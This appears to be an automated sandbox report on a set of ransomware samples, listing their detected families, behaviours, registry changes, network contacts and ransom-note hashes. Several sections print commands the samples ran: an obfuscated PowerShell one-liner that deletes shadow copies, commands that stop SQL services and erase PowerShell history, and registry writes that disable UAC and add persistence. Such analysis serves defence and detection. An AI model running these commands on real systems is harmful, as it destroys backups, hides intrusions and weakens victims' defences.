Analysis Overview
SHA256
c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Threat Level: Known bad
The file RS.7z was found to be: Known bad.
Malicious Activity Summary
MedusaLocker payload
Makop
UAC bypass
Avoslocker Ransomware
Mespinoza family
Conti Ransomware
Detects Go variant of Hive Ransomware
Sodinokibi family
BlackMatter Ransomware
Avaddon
Blackmatter family
Hades payload
Hades Ransomware
Lockbit
Hive
Medusalocker family
DarkSide
Babuk Locker
DearCry
CryptOne packer
Modifies boot configuration data using bcdedit
Renames multiple (133) files with added filename extension
Renames multiple (179) files with added filename extension
Renames multiple (9368) files with added filename extension
Renames multiple (160) files with added filename extension
Renames multiple (3331) files with added filename extension
Renames multiple (150) files with added filename extension
Renames multiple (7382) files with added filename extension
Renames multiple (153) files with added filename extension
Renames multiple (162) files with added filename extension
Renames multiple (8801) files with added filename extension
Renames multiple (164) files with added filename extension
Renames multiple (77) files with added filename extension
Renames multiple (227) files with added filename extension
Deletes shadow copies
Renames multiple (180) files with added filename extension
Renames multiple (158) files with added filename extension
Renames multiple (1641) files with added filename extension
Renames multiple (450) files with added filename extension
Renames multiple (7310) files with added filename extension
Renames multiple (7995) files with added filename extension
Renames multiple (6418) files with added filename extension
Renames multiple (66) files with added filename extension
Renames multiple (174) files with added filename extension
Renames multiple (246) files with added filename extension
Renames multiple (257) files with added filename extension
Drops file in Drivers directory
Deletes backup catalog
Boot or Logon Autostart Execution: Active Setup
UPX packed file
Deletes itself
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Boot or Logon Autostart Execution: Print Processors
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Adds Run key to start application
Looks up external IP address via web service
Drops desktop.ini file(s)
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Detects Pyinstaller
Unsigned PE
Enumerates physical storage devices
NSIS installer
Uses Task Scheduler COM API
Modifies registry class
Views/modifies file attributes
Uses Volume Shadow Copy service COM API
Suspicious use of AdjustPrivilegeToken
System policy modification
Suspicious behavior: EnumeratesProcesses
Modifies Control Panel
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Interacts with shadow copies
Checks SCSI registry key(s)
Runs ping.exe
Analysis: static1
Detonation Overview
Reported
2024-07-07 14:07
Signatures
Blackmatter family
MedusaLocker payload
Medusalocker family
Mespinoza family
Sodinokibi family
CryptOne packer
UPX packed file
Detects Pyinstaller
Unsigned PE
NSIS installer
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1563s
Max time network
1570s
Signatures
Avoslocker Ransomware
Renames multiple (77) files with added filename extension
Suspicious behavior: EnumeratesProcesses
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"
Network
Files
C:\MSOCache\GET_YOUR_FILES_BACK.txt
| MD5 | 0237b63f764204e00d7242cc4d908271 |
| SHA1 | 9d88e59463e2a963bea95d6a2cc5383e922f2f27 |
| SHA256 | 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857 |
| SHA512 | 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e |
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240704-en
Max time kernel
1799s
Max time network
1568s
Signatures
Loads dropped DLL
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Service *sql*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell rm (Get-PSReadlineOption).HistorySavePath
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 89.44.169.132:80 | mega.io | tcp |
| LU | 89.44.169.132:443 | mega.io | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.16:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.16:443 | g.api.mega.co.nz | tcp |
Files
memory/1380-1099-0x0000000002D70000-0x0000000002DF0000-memory.dmp
memory/1380-1100-0x000000001B560000-0x000000001B842000-memory.dmp
memory/1380-1101-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
C:\MSOCache\All Users\decrypt_file.TxT
| MD5 | a36d9aeb2b6bc7da5a8b336bbc4f542e |
| SHA1 | f5caf80eccd8a2ee2095cfe4a3f2d796c6b47bc0 |
| SHA256 | 3144df848208a9edef3e03d32a5ba4bf105186f48f7ed9e267876e4064681f9f |
| SHA512 | a2aef5507e493340c95250f43227d8a6835c832d6a852e1b850e67ecccfa3934061220aa8bd94fa38721687681e9363f75ad364bb47c81c126c6f51fac682fa5 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1560s
Max time network
1566s
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2108 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"
C:\Windows\SysWOW64\cmd.exe
/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL
Network
Files
memory/2108-0-0x0000000000520000-0x0000000000580000-memory.dmp
memory/2108-1-0x0000000000400000-0x000000000046C000-memory.dmp
C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt
| MD5 | 69acb73a5829bdddc9a7cf322178c70f |
| SHA1 | 3cd71f6cc40c90322e027712403899db2976218b |
| SHA256 | 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5 |
| SHA512 | 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e |
memory/2108-1800-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-3317-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-4023-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2108-5030-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-6488-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-8218-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2108-8549-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2108-8548-0x0000000000400000-0x000000000051D000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240508-en
Max time kernel
1560s
Max time network
1562s
Signatures
BlackMatter Ransomware
Renames multiple (180) files with added filename extension
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\XS6hn5xhL.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\XS6hn5xhL.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | paymenthacks.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
| US | 8.8.8.8:53 | mojobiden.com | udp |
Files
memory/2576-0-0x0000000000200000-0x0000000000240000-memory.dmp
C:\XS6hn5xhL.README.txt
| MD5 | f66968c47a64569e2281f65a95991be0 |
| SHA1 | ef9e3e80bfbea4c3021b226cb8cd00687013b8a8 |
| SHA256 | 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf |
| SHA512 | cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1559s
Max time network
1541s
Signatures
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2112 wrote to memory of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"
C:\Windows\SysWOW64\cmd.exe
/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/2112-0-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-1-0x00000000022D0000-0x0000000002330000-memory.dmp
memory/2112-2-0x0000000000400000-0x000000000046C000-memory.dmp
C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt
| MD5 | 69acb73a5829bdddc9a7cf322178c70f |
| SHA1 | 3cd71f6cc40c90322e027712403899db2976218b |
| SHA256 | 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5 |
| SHA512 | 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e |
memory/2112-1339-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-1994-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-3958-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-4850-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2112-6830-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-9596-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-12480-0x0000000000400000-0x000000000051D000-memory.dmp
memory/2112-12482-0x0000000000400000-0x000000000046C000-memory.dmp
memory/2112-12481-0x0000000000400000-0x000000000051D000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win7-20240705-en
Max time kernel
1561s
Max time network
1567s
Signatures
DarkSide
Renames multiple (179) files with added filename extension
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\a8e86c8e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\a8e86c8e.BMP" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e\ = "a8e86c8e" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\a8e86c8e.ico" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2656 wrote to memory of 2684 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\README.a8e86c8e.TXT
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1799s
Max time network
1445s
Command Line
Signatures
Avaddon
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Deletes shadow copies
Renames multiple (257) files with added filename extension
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | \??\Z:\$RECYCLE.BIN\S-1-5-21-2660163958-4080398480-1122754539-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\bckgrd.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\Admin\\bckgrd.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary value omitted) | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary value omitted) | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
